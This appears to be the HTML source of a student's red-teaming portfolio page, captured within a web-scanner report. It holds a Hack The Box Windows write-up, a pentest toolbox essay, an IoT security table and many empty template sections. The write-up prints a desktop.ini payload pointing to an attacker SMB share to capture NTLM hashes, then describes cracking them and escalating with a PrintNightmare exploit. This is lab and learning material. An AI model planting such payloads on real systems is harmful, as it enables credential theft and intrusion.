                                              Iconfile=\\10.10.14.161\share\test.ico
                                              [Taskbar]
                                              Command=ToggleDesktop
                                          </code>
                                      </pre>
          <a href="img/portfolio/minor/red/htb_windows/ResponderOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/ResponderOutput.png" alt=""></a>
          <p>I created a payload like the example given on the site I found started responder and got
          a few hits. Now we know the username and maybe the password if we manage to crack
          it. We know from the responder output that it is a NTLM hash so lets put Hashcat on it
          and see what we'll get.</p>
          <a href="img/portfolio/minor/red/htb_windows/HashcatOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/HashcatOutput.png" alt=""></a>
          <p>Hashcat cracked the password with ease and now we can take a look at the SMB folder to
          see if we can find anything interesting.</p>
          <a href="img/portfolio/minor/red/htb_windows/SMBMap.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/SMBMap.png" alt=""></a>
          <p>We didn't find anything interesting but knowing from the NMap output we also know that
          the RDP port is open so maybe it uses the same password.</p>
          <a href="img/portfolio/minor/red/htb_windows/UserFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/UserFlag.png" alt=""></a>
          <p>This was indeed the case and now we already have the user flag. For priv esc running at
          least WinPEAS is a no-brainer. So I used SimpleHTTPServer to get WinPEAS on the target
          machine.</p>
          <a href="img/portfolio/minor/red/htb_windows/SimpleHTTPServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/SimpleHTTPServer.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_windows/WgetWinpeas.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/WgetWinpeas.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_windows/ProcessPrintSpool.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/ProcessPrintSpool.png" alt=""></a>
          <p>Really the only interesting thing WinPEAS found was a Print spooler process. After some
          Googling I stubled across <a href="https://github.com/calebstewart/CVE-2021-1675">this</a> CVE. So lets get
          that exploit on the target machine in the same way we did with WinPEAS.</p>
          <a href="img/portfolio/minor/red/htb_windows/WgetPrintNightmare.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/WgetPrintNightmare.png" alt=""></a>
          <p>I wasn't able to run the script because of some permission issues, but after some
          Googling I found out I could just set the policy to unrestricted.</p>
          <a href="img/portfolio/minor/red/htb_windows/RunExploit.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/RunExploit.png" alt=""></a>
          <p>I ran the exploit and it created a new administrator account for me with a username and
          password that I chose and know. Now the only thing that's left is just to logout as this
          user and login with our new user.</p>
          <a href="img/portfolio/minor/red/htb_windows/RootFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/RootFlag.png" alt=""></a>
          <p>And that's it! We have the root flag! This box wasn't that hard but still fun and
          sometimes challenging due to my lack of knowledge of Windows hacking. Overall a fun
          learning experience.</p>
          <ul class="list-inline">
          <li>Date: October 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal24" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal25" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">My personal pen-testing toolboxes</p>
          <p>Like every other profession good tools make a world of difference on the quality and
          efficiency of the end product. This isn't any different with cyber security. Good tools
          can improve results providing you with more information and helping with getting to the
          results faster.</p>
          <h3>On the road</h3>
          <a href="img/portfolio/minor/red/kalilinux.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/kalilinux.jpg" alt=""></a>
          <p>On the road when I'm on my laptop I like to use Kali Linux. It's just convenient that it
          comes pre-loaded with all the tools you need, and it runs fairly lightweight on older
          laptops. The "kali-undercover" command is also a fun little gimmick that changes your
          Kali desktop to a Windows clone which for a random passer by looks just like a regular
          Windows machine. Making it incognito to use Kali whenever you're in a public space and
          want to keep a low profile.</p>
          <h3>At home</h3>
          <a href="img/portfolio/minor/red/parrotos.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/parrotos.jpg" alt=""></a>
          <p>At home on my main desktop PC I recently switched to natively running ParrotOS. This was
          because I liked to try something new and the reviews were good. It comes pre-loaded with
          the same tools as kali and a few extra tools like diverting all traffic trough tor
          making the machine even more anonymous. The user experience is a little better and just
          overall a good looking distro. This comes at a cost because it takes more resources to
          run. This isn't a problem on my PC because it's quite powerful and I don't have to think
          about battery life. Alongside ParrotOS I run a Windows VM in qemu with WinApps running
          on Linux which enables me to run any Windows application I want on Linux. I mostly use
          it for Microsoft Office products.</p>
          <h3>Cloud</h3>
          <a href="img/portfolio/minor/red/googlecloudconsole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/googlecloudconsole.PNG" alt=""></a>
          <p>Google cloud console is an awesome way to always have a Linux machine at your disposal
          where ever you are. It's fully cloud based and free to use. So when you're in need of a
          Linux terminal and you have access to a browser you're set. The only downside is that
          the machine is volatile so when you shut it down it is gone. This requires you to always
          re-install tools and such. Luckily due to it running on Google cloud it is pretty fast.
          Just overall a good tool to know about.</p>
          <a href="img/portfolio/minor/red/guacamole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/guacamole.PNG" alt=""></a>
          <p>Now Guacamole is kinda like Google cloud console, but it's self-hosted. It can turn any
          machine with a SSH server into a cloud based web terminal accessible from any browser
          where ever you are. It takes a little time and effort to set it up but it is worth it.
          All the benefits from Google cloud console but your data is hosted by you and it is
          saved. In my case I installed Kali Linux on a docker server and now I can access it
          whenever I need to it doesn't matter if I'm on Windows, Linux or even my phone.</p>
          <a href="img/portfolio/minor/red/guacamoleconsole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/guacamoleconsole.PNG" alt=""></a>
          <h3>Windows</h3>
          <a href="img/portfolio/minor/red/wsl.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/wsl.jpg" alt=""></a>
          <p>Whenever I'm using Windows and need to do a quick little task that requires Linux I don't
          want to reboot and boot into Linux because it's a hassle. That's when I use WSL. WSL
          stands for Windows Subsystem for Linux and it works great. It's not everything for
          example network related stuff is not possible due to WSL not having direct access to the
          network card but for other simple stuff it works great. And if I need to do a quick
          little scan I can use the Windows version of NMap. And if I need a little more
          functionality I can always use the before mentioned Guacamole to have instant access to
          a fully functional Kali instance in my browser.</p>
          <ul class="list-inline">
          <li>Date: September 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal26" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">Security of IOT protocols and technology</p>
          <p>Nowadays more and more people have their home filled with smart devices. Almost
          everything is smart in some way. Which creates new problems like security. These
          products weren't made with security in mind, on the contrary, they were made to be cheap
          and easy to use for people without IT knowledge.</p>
          <p>This causes IOT products to be, the most of the time, the weakest link in someones
          network. But IOT is here to stay and it is improving fast so let's take a look at some
          common security protocols.</p>
          <table>
          <tr>
          <th>Protocol</th>
          <th>Feature</th>
          <th>TCP/UDP</th>
          <th>Security</th>
          </tr>
          <tr>
          <td>LOWPAN</td>
          <td>WPANs to maintain an IPv6 network</td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>MQTT</td>
          <td>To utilize the publish/subscribe pattern to provide transition flexibility and
          simplicity of implementation
          </td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>AMQP</td>
          <td>To provide publish-subscribe and point-to point communication</td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>CoAP</td>
          <td>To connect resource-constrained devices in a secure and reliable way</td>
          <td>UDP</td>
          <td>DTLS</td>
          </tr>
          <tr>
          <td>XMPP</td>
          <td>To transfer instant messaging (IM) standard that is used for multi-party
          chatting, voice and video calling and telepresence
          </td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>DSS</td>
          <td>To enable scalable, real-time, dependable, high-performance and interoperable
          data exchanges using a publish–subscribe pattern
          </td>
          <td>TCP/UDP</td>
          <td>SSL</td>
          </tr>
          </table>
          <p>To show the security flaws in IOT devices</p>
          <table>
          <thead>
          <tr class="rowsep-1 valign-top">
          <th scope="col">Layers</th>
          <th scope="col">Attacks</th>
          <th scope="col">Issues</th>
          <th scope="col">Control Measures</th>
          </tr>
          </thead>
          <tbody>
          <tr class="valign-top">
          <td class="align-left" rowspan="6">Perception</td>
          <td class="align-left">Hardware Tempering</td>
          <td class="align-left">Data Leakage (Keys, Routing Tables, Etc)</td>
          <td class="align-left">Secure Physical Design</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Fake Node Injection</td>
          <td class="align-left">Fake Data Manipulation</td>
          <td class="align-left">Secure Booting</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Malicious Code Injection</td>
           <td class="align-left">Halt Transmission</td>
          <td class="align-left">Intrusion Detection Technology (IDT)</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Sleep Denial Attack</td>
          <td class="align-left">Node Shutdown</td>
          <td class="align-left">Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">WSN Node Jamming</td>
          <td class="align-left">Jam Node Communication</td>
          <td class="align-left">IPSec Security Channel</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RF Interference Of RFID</td>
          <td class="align-left">Distortion In Node Communication</td>
          <td class="align-left">Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left" rowspan="12">Network</td>
          <td class="align-left">Traffic Analysis Attacks</td>
          <td class="align-left">Data Leakage (About Network)</td>
          <td class="align-left">Routing Security</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RFID Spoofing</td>
          <td class="align-left">Intrusion In Network Data Manipulation</td>
          <td class="align-left">GPS Location System</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RFID Unauthorized Access</td>
          <td class="align-left">Node Data Can Be Modified (Read, Write &amp; Delete)</td>
          <td class="align-left">Network Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Sinkhole Attack</td>
          <td class="align-left">Data Leakage (Data Of The Nodes)</td>
          <td class="align-left">Security Aware Ad Hoc Routing</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Man In The Middle Attack</td>
          <td class="align-left">Data Privacy Violation</td>
          <td class="align-left">Point-To-Point Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Routing Information Attack</td>
          <td class="align-left">Routing Loops (Network Destruction)</td>
          <td class="align-left">Encrypting Routing Tables</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Application Security</td>
          <td class="align-left">Privacy Violation</td>
          <td class="align-left">Web Application Scanner</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Data Security</td>
           <td class="align-left">Data Leakage (User Data On Cloud)</td>
          <td class="align-left">Homomorphic Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Underlying Infrastructure Security</td>
          <td class="align-left">Service Hijacking</td>
          <td class="align-left">Fragmentation Redundancy Scattering</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Third-Party Relationships</td>
          <td class="align-left">Data Leakage (User Data On Cloud)</td>
          <td class="align-left">Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Shared Resources</td>
          <td class="align-left">Resources Destruction</td>
          <td class="align-left">Hyper Safe</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Virtualization Threats</td>
          <td class="align-left">Resources Theft</td>
          <td class="align-left">Hyper Safe</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left" rowspan="6">Application</td>
          <td class="align-left">Phishing Attacks</td>
          <td class="align-left">Data Leakage (User Credentials Data)</td>
          <td class="align-left">Biometrics Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Virus, Worms, Trojan Horse, Spyware</td>
          <td class="align-left">Resource Destruction &amp; Hijacking</td>
          <td class="align-left">Protective Software</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Malicious Scripts</td>
          <td class="align-left">Hijacking</td>
          <td class="align-left">Firewalls</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Denial Of Service</td>
          <td class="align-left">Resource Destruction</td>
          <td class="align-left">Access Control Lists</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Data Protection And Recovery</td>
          <td class="align-left">Data Loss &amp; Catastrophic Damage</td>
          <td class="align-left">Cryptographic Hash Functions</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Software Vulnerabilities</td>
          <td class="align-left">Buffer Over Flow</td>
          <td class="align-left">Awareness Of Security</td>
          </tr>
          </tbody>
          </table>
          <a href="https://www.sciencedirect.com/science/article/pii/S108480452030237X#sec3">Source</a>
           <p>As seen in this article there are a lot of different vulnerabilities in IOT devices. And
          not all of them can be solved with just a good security protocol.</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: November 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal27" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal28" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
           </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal29" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal30" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal31" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
           <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal33" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal34" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
           <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal35" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal36" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal37" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal38" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal39" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal40" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script src="vendor/jquery/jquery.min.js"></script>
          <script src="vendor/bootstrap/js/bootstrap.bundle.min.js"></script>
          
          <script src="vendor/jquery-easing/jquery.easing.min.js"></script>
          
          <script src="js/jqBootstrapValidation.js"></script>
          <script src="js/contact_me.js"></script>
          
          <script src="js/agency.min.js"></script>
          
          <script src="https://cdn.jsdelivr.net/gh/google/code-prettify@master/loader/run_prettify.js"></script>
          </body>
          </html>
          
          Evidence
          083845791
          Solution

          Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.

        4. GET https://beekmans.dev
          Alert tags
          Alert description

          A timestamp was disclosed by the application/web server - Unix

          Other info

          166584919, which evaluates to: 1975-04-13 02:35:19

          Request
          Request line and header section (192 bytes)
          GET https://beekmans.dev HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
